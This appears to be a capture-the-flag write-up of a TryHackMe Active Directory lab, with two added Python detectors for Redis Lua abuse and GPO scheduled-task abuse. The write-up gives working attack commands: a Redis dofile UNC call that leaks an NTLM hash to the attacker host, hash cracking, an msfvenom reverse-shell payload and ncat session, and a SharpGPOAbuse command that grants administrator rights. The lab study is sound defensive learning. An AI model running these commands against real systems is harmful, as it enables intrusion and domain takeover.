```
# Nmap 7.92 scan initiated Tue Dec 14 17:33:28 2021 as: nmap -sSVC -p- -v -oA nmap_full -Pn 10.10.255.87
Nmap scan report for 10.10.255.87
Host is up (0.061s latency).
Not shown: 65522 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
6379/tcp  open  redis         Redis key-value store 2.8.2402
49665/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49683/tcp open  msrpc         Microsoft Windows RPC
49696/tcp open  msrpc         Microsoft Windows RPC
49722/tcp open  msrpc         Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Dec 14 17:45:23 2021 -- 1 IP address (1 host up) scanned in 715.74 seconds
```
```
$ enum4linux-ng -A 10.10.255.87
...
 =========================================
|    SMB Dialect Check on 10.10.255.87    |
 =========================================
[*] Trying on 445/tcp
[+] Supported dialects and settings:
SMB 1.0: false
SMB 2.02: true
SMB 2.1: true
SMB 3.0: true
SMB1 only: false
Preferred dialect: SMB 3.0
SMB signing required: true
...
 ===================================================
|    Domain Information via RPC for 10.10.255.87    |
 ===================================================
[+] Domain: VULNNET
[+] SID: S-1-5-21-1405206085-1650434706-76331420
[+] Host is part of a domain (not a workgroup)

 ===========================================================
|    Domain Information via SMB session for 10.10.255.87    |
 ===========================================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found domain information via SMB
NetBIOS computer name: VULNNET-BC3TCK1
NetBIOS domain name: VULNNET
DNS domain: vulnnet.local
FQDN: VULNNET-BC3TCK1SHNQ.vulnnet.local
...
```
Lua's dofile() lets us request a file, but since Redis runs on Windows here it also
accepts a UNC path to a share: dofile('//host/share').
So if we launch an SMB server with Responder on one side and force the server
to request a share on the other, we may be able to capture an NTLM hash.
Redis CLI:

```
10.10.156.87:6379> EVAL "dofile('//10.9.19.77/noraj')" 0
(error) ERR Error running script (call to f_ca7d1737b7cbf25c9d042cce4a3adce566e3e8bd): @user_script:1: cannot open //10.9.19.77/noraj: Permission denied
(0.60s)
```
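As an added defensive example, not part of the original writeup: a Python checker that runs over constructed `redis-cli MONITOR` lines and flags EVAL, EVALSHA and SCRIPT LOAD bodies that call Lua file functions or reference a UNC path, which is exactly the call pattern shown above. The sample lines are constructed and the list of file functions is an assumption.

```python
import hashlib
import re

# Constructed sample in the format printed by `redis-cli MONITOR`:
# <unix time> [<db> <client addr>] "<cmd>" "<arg>" ...
_LOADED = "loadfile('//10.9.19.77/x')"
SAMPLE_MONITOR = """\
1639675201.412 [0 10.9.19.77:51230] "EVAL" "return redis.call('get', KEYS[1])" "1" "k"
1639675202.733 [0 10.9.19.77:51230] "EVAL" "dofile('//10.9.19.77/noraj')" "0"
1639675203.005 [0 10.9.19.77:51231] "SCRIPT" "LOAD" "%s"
1639675204.118 [0 10.9.19.77:51231] "EVALSHA" "%s" "0"
""" % (_LOADED, hashlib.sha1(_LOADED.encode()).hexdigest())

# Lua functions that reach the filesystem; a cache script never needs them.
FILE_FUNCS = re.compile(r"\b(dofile|loadfile|io\.open|io\.lines|os\.execute)\s*\(")
# A UNC path: on Windows the SMB client authenticates outbound to open it.
UNC_PATH = re.compile(r"(?<![\w:])//[\w.-]+/[^'\"\s]*")
LINE_RE = re.compile(r"^(?P<ts>\d+\.\d+) \[(?P<db>\d+) (?P<addr>[^\]]+)\] (?P<args>.*)$")
ARG_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')  # one quoted argument


def judge_script(script):
    """Explain why a Lua body is suspicious, or return None when it is clean."""
    funcs = sorted(set(FILE_FUNCS.findall(script)))
    uncs = UNC_PATH.findall(script)
    if not funcs and not uncs:
        return None
    return "file functions %s, UNC paths %s" % (funcs, uncs)


def find_suspicious_scripts(monitor_text):
    """Return (ts, client, command, reason) for scripting calls whose Lua body touches
    files or UNC paths. EVALSHA bodies are recovered from an earlier SCRIPT LOAD in the
    same capture (Redis keys them by the SHA-1 of the script text)."""
    loaded, hits = {}, []
    for m in filter(None, map(LINE_RE.match, monitor_text.splitlines())):
        args = ARG_RE.findall(m.group("args"))
        cmd = args[0].upper() if args else ""
        if cmd == "SCRIPT" and len(args) > 2 and args[1].upper() == "LOAD":
            script = args[2]
            loaded[hashlib.sha1(script.encode()).hexdigest()] = script
        elif cmd == "EVAL" and len(args) > 1:
            script = args[1]
        elif cmd == "EVALSHA" and len(args) > 1:
            script = loaded.get(args[1].lower(), "")  # unknown SHA: nothing to judge
        else:
            continue
        reason = judge_script(script)
        if reason:
            hits.append((m.group("ts"), m.group("addr"), cmd, reason))
    return hits
```

On a real instance the same logic applies to the output of `redis-cli MONITOR` piped into the function; the cheaper mitigation is to not expose the port and to rename or disable EVAL where scripting is not needed.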
Let's find the correct format name for NTLMv2 in JtR and hashcat thanks to haiti.

```
$ haiti 'enterprise-security::VULNNET:e3ce6172d5c46f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etNTLMv2 [HC: 5600] [JtR: netntlmv2]
```
Now let's crack it:
```
$ john hashes.txt -w=/usr/share/wordlists/passwords/rockyou.txt --format=netntlmv2
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
edited           (enterprise-security)
1g 0:00:00:03 DONE (2021-12-16 15:25) 0.3021g/s 1212Kp/s 1212Kc/s 1212KC/s sandoval64..sand3465
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed
```
It is always interesting to launch several tools: here smbmap says NO ACCESS
for Enterprise-Share while cme says READ.
Enumerating the files doesn't work with smbmap since it doesn't detect
Enterprise-Share as readable, and cme doesn't have a feature to list the files of
an SMB share. So we're forced to use the old smbclient or less known tools.
For example nullinux lists the first level of files of all shares, but
is not very flexible as you can't specify a share nor choose the depth.
```
[*] Enumerating: \\10.10.156.87\Enterprise-Share
  .                                   D        0  Thu Dec 16 15:34:20 2021
  ..                                  D        0  Thu Dec 16 15:34:20 2021
  PurgeIrrelevantData_1826.ps1        A       69  Wed Feb 24 01:33:18 2021
  SRQODJGBTA                          A        0  Thu Dec 16 15:30:19 2021
  ZFBMNPOJDV                          A        0  Thu Dec 16 15:34:20 2021

[*] Enumerating: \\10.10.156.87\NETLOGON
  .                                   D        0  Tue Feb 23 10:29:58 2021
  ..                                  D        0  Tue Feb 23 10:29:58 2021

[*] Enumerating: \\10.10.156.87\SYSVOL
  .                                   D        0  Tue Feb 23 10:29:58 2021
  ..                                  D        0  Tue Feb 23 10:29:58 2021
  vulnnet.local                      Dr        0  Tue Feb 23 10:29:58 2021

[*] 0 unique user(s) identified
```
The Impacket version of smbclient is not able to enumerate shares or list their
content (at least not with an option) and the auth is not working anyway.
So let's get back to the old smbclient. It's a nightmare, but at least it works.
```
# List shares, just for testing
$ smbclient -I 10.10.76.216 -U 'enterprise-security' --password edited --client-protection sign -L 10.10.76.216

# List files
$ smbclient -I 10.10.76.216 -U 'enterprise-security' --password edited --client-protection sign '\\10.10.76.216\Enterprise-Share'
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Tue Feb 23 23:45:41 2021
  ..                                  D        0  Tue Feb 23 23:45:41 2021
  PurgeIrrelevantData_1826.ps1        A       69  Wed Feb 24 01:33:18 2021

smb: \> get PurgeIrrelevantData_1826.ps1
getting file \PurgeIrrelevantData_1826.ps1 of size 69 as PurgeIrrelevantData_1826.ps1 (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
```
We have to guess that it's part of a scheduled task. It can't be
exploited as is, but it seems that even if the share is shown as read-only,
we can in fact overwrite the file.
```
smb: \> put PurgeIrrelevantData_1826.ps1
putting file PurgeIrrelevantData_1826.ps1 as \PurgeIrrelevantData_1826.ps1 (1.3 kb/s) (average 8.4 kb/s)
```
The stageless PS reverse shell from msf wasn't working.
```
$ msfvenom -p cmd/windows/powershell_reverse_tcp LHOST=10.9.19.77 LPORT=9999 -f ps1 -o PurgeIrrelevantData_1826.ps1 --platform windows -a cmd
No encoder specified, outputting raw payload
Payload size: 1676 bytes
Final size of ps1 file: 8397 bytes
Saved as: PurgeIrrelevantData_1826.ps1
```
PowerShell #1 and PowerShell #2 from https://www.revshells.com/ weren't working
(they contacted the attacker machine but then closed the socket), but fortunately
the PowerShell #3 reverse shell worked.
```
$ ncat -nlvp 9999
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::9999
Ncat: Listening on 0.0.0.0:9999
Ncat: Connection from 10.10.76.216.
Ncat: Connection from 10.10.76.216:49826.
SHELL> whoami
vulnnet\enterprise-security
SHELL> whoami /all

USER INFORMATION
----------------

User Name                   SID
=========================== ============================================
vulnnet\enterprise-security S-1-5-21-1405206085-1650434706-76331420-1103


GROUP INFORMATION
-----------------

Group Name                                 Type             SID          Attributes
========================================== ================ ============ ==================================================
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE                       Well-known group S-1-5-6      Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                              Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
LOCAL                                      Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1     Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeMachineAccountPrivilege     Add workstations to domain                Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.

SHELL> systeminfo

Host Name:                 VULNNET-BC3TCK1
OS Name:                   Microsoft Windows Server 2019 Datacenter Evaluation
OS Version:                10.0.17763 N/A Build 17763
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Primary Domain Controller
OS Build Type:             Multiprocessor Free
...
System Manufacturer:       Xen
System Model:              HVM domU
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 63 Stepping 2 GenuineIntel ~2400 Mhz
BIOS Version:              Xen 4.11.amazon, 8/24/2006
...
```
After having lost hours trying to compile C# projects on Linux, in the end, even
if PowerSploit is archived and no longer maintained, it's way easier to use
PowerView.
```
$ smbclient -I 10.10.45.244 -U 'enterprise-security' --password edited --client-protection sign '\\10.10.45.244\sysvol'
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Tue Feb 23 10:29:58 2021
  ..                                  D        0  Tue Feb 23 10:29:58 2021
  vulnnet.local                      Dr        0  Tue Feb 23 10:29:58 2021

		9558271 blocks of size 4096. 5139591 blocks available
smb: \> cd vulnnet.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\
smb: \vulnnet.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\> dir
  .                                   D        0  Tue Feb 23 10:30:37 2021
  ..                                  D        0  Tue Feb 23 10:30:37 2021
  GPT.INI                             A       22  Tue Feb 23 10:36:27 2021
  MACHINE                             D        0  Tue Feb 23 22:58:25 2021
  USER                                D        0  Tue Feb 23 10:30:37 2021

		9558271 blocks of size 4096. 5139591 blocks available
smb: \vulnnet.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\> lcd pol
smb: \vulnnet.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\> mask ""
smb: \vulnnet.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\> recurse ON
smb: \vulnnet.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\> prompt OFF
smb: \vulnnet.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\> mget *
getting file \vulnnet.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\GPT.INI of size 22 as GPT.INI (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
getting file \vulnnet.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Registry.pol of size 2790 as MACHINE/Registry.pol (25.9 KiloBytes/sec) (average 12.9 KiloBytes/sec)
getting file \vulnnet.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 1098 as MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf (9.5 KiloBytes/sec) (average 11.7 KiloBytes/sec)
```
There's not much we can see directly.
So let's use the BloodHound PowerShell collector, SharpHound.ps1.
```
smb: \> get 20211217084021_BloodHound.zip
getting file \20211217084021_BloodHound.zip of size 8991 as 20211217084021_BloodHound.zip (77.7 KiloBytes/sec) (average 77.7 KiloBytes/sec)
```
Neo4J works only with Java 8.
```
$ sudo archlinux-java set java-8-openjdk/jre
$ sudo systemctl status neo4j
```
Follow the neo4j
documentation if you need to set up the database for the first time.
After login, click on Upload Data on BloodHound and select the archive.
Then use the default analysis query Find Shortest Paths to Domain Admins.
We can see that our user enterprise-security can write to the GPO security-pol-vn, and
since this GPO is applied to the whole domain, it allows taking over the domain
admin account or doing many other things.
Several techniques to exploit Group Policy Objects (GPO) are detailed on PayloadsAllTheThings.
I wanted to use the Abuse GPO with PowerView method but it refers to a very old
version of PowerSploit.
```
PS C:\Enterprise-Share> gpupdate /force
Updating policy...

Computer Policy update has completed successfully.
User Policy update has completed successfully.

PS C:\Enterprise-Share> net user enterprise-security
```
It seems the task is never executed: either the task fails, or Add-GPOImmediateTask
fails to register it, or, when the GPO already has a ScheduledTasks.xml,
it requires the -Force option to update it, but the script was failing when using it.
I found a pre-compiled version of SharpGPOAbuse and verified its integrity:
```
PS C:\Enterprise-Share> .\SharpGPOAbuse.exe --AddComputerTask --TaskName 'noraj' --Author 'vulnnet\administrator' --Command "powershell.exe /c" --Arguments "net localgroup administrators enterprise-security /add" --GPOName "security-pol-vn"
[+] Domain = vulnnet.local
[+] Domain Controller = VULNNET-BC3TCK1SHNQ.vulnnet.local
[+] Distinguished Name = CN=Policies,CN=System,DC=vulnnet,DC=local
[+] GUID of "security-pol-vn" is: {31B2F340-016D-11D2-945F-00C04FB984F9}
[+] Creating file \\vulnnet.local\SysVol\vulnnet.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml
[+] versionNumber attribute changed successfully
[+] The version number in GPT.ini was increased successfully.
[+] The GPO was modified to include a new immediate task. Wait for the GPO refresh cycle.
[+] Done!
PS C:\Enterprise-Share> gpupdate /force
PS C:\Enterprise-Share> net user enterprise-security
User name                    enterprise-security
Full Name                    Enterprise Security
Comment                      TryHackMe
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            2/23/2021 3:02:39 PM
Password expires             Never
Password changeable          2/24/2021 3:02:39 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   12/24/2021 12:18:05 PM

Logon hours allowed          All

Local Group Memberships      *Administrators
Global Group memberships     *Domain Users
The command completed successfully.
```
Again the account was not appearing in the Administrators group. But running
net user enterprise-security a few minutes later, it was appearing. So maybe
PowerGPOAbuse was working too and I just needed to wait for the sync (even if
gpupdate says it's done).
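As an added defensive example, not part of the original writeup: a Python audit of the ScheduledTasks.xml that an immediate-task GPO modification drops into SYSVOL (the file path is visible in the SharpGPOAbuse output above, and a writable GPO is what BloodHound surfaced earlier). The XML sample is constructed to mirror the Group Policy Preferences layout, and the list of suspicious command fragments is an assumption.

```python
import xml.etree.ElementTree as ET

# Constructed sample modelled on the Group Policy Preferences file
# <GPO GUID>\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml in SYSVOL: the
# first entry mirrors an immediate-task GPO modification, the second a normal task.
SAMPLE_XML = """<ScheduledTasks clsid="{CC63F200-7309-4ba0-B154-A71CD118DBCC}">
  <ImmediateTaskV2 clsid="{9756B581-76EC-4169-9AFC-0CA8D43ADB5F}" name="noraj"
                   changed="2021-12-24 12:10:00" uid="{00000000-0000-0000-0000-000000000001}">
    <Properties action="C" name="noraj" runAs="NT AUTHORITY\\System" logonType="S4U">
      <Task version="1.3"><Actions Context="Author"><Exec>
        <Command>powershell.exe /c</Command>
        <Arguments>net localgroup administrators enterprise-security /add</Arguments>
      </Exec></Actions></Task>
    </Properties>
  </ImmediateTaskV2>
  <TaskV2 clsid="{D8896631-B747-47a7-84A6-C155337F3BC8}" name="Cleanup" uid="{00000000-0000-0000-0000-000000000002}">
    <Properties action="U" name="Cleanup" runAs="NT AUTHORITY\\System" logonType="S4U">
      <Task version="1.3"><Actions Context="Author"><Exec>
        <Command>C:\\Scripts\\PurgeIrrelevantData_1826.ps1</Command>
      </Exec></Actions></Task>
    </Properties>
  </TaskV2>
</ScheduledTasks>
"""

# Command fragments that change group membership or fetch/run remote code
# (an assumed starting list; extend it from your own baseline).
SUSPICIOUS = ("net localgroup", "net group", "add-localgroupmember", "add-adgroupmember",
              "-encodedcommand", " -enc ", "downloadstring", "invoke-expression", "iex ")


def audit_scheduled_tasks(xml_text):
    """Return one finding per task that looks like an abuse: an immediate task
    running as SYSTEM, or any task whose command line contains a SUSPICIOUS
    fragment. A plain SYSTEM task with a benign command yields no finding."""
    findings = []
    for task in ET.fromstring(xml_text):
        props = task.find("Properties")
        exe = None if props is None else props.find(".//Actions/Exec")
        cmd = "" if exe is None else (exe.findtext("Command", "") + " " + exe.findtext("Arguments", "")).strip()
        reasons = []
        if task.tag.startswith("ImmediateTask"):
            reasons.append("immediate task: runs once at the next policy refresh")
        if props is not None and props.get("runAs", "").lower().endswith("system"):
            reasons.append("runs as SYSTEM")
        hits = [s for s in SUSPICIOUS if s in cmd.lower()]
        if hits:
            reasons.append("suspicious command fragments %s" % hits)
        if hits or len(reasons) == 2:
            findings.append({"name": task.get("name"), "type": task.tag, "command": cmd, "reasons": reasons})
    return findings
```

Run it over every Preferences\ScheduledTasks\ScheduledTasks.xml under SYSVOL and pair it with a check of which principals hold write rights on each GPO, since the writable GPO is the root cause here.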
We can now connect to the C$ share.

```
$ smbclient -I 10.10.103.170 -U 'enterprise-security' --password edited --client-protection sign '\\10.10.103.170\C$'
Try "help" to get a list of possible commands.
smb: \> get Users\Administrator\Desktop\system.txt
getting file \Users\Administrator\Desktop\system.txt of size 37 as Users\Administrator\Desktop\system.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
```
```
[*] Requesting shares on 10.10.103.170.....
[*] Found writable share ADMIN$
[*] Uploading file gvGKegKI.exe
[*] Opening SVCManager on 10.10.103.170.....
[*] Creating service akDa on 10.10.103.170.....
[*] Starting service akDa.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.1757]
(c) 2018 Microsoft Corporation. All rights reserved.
```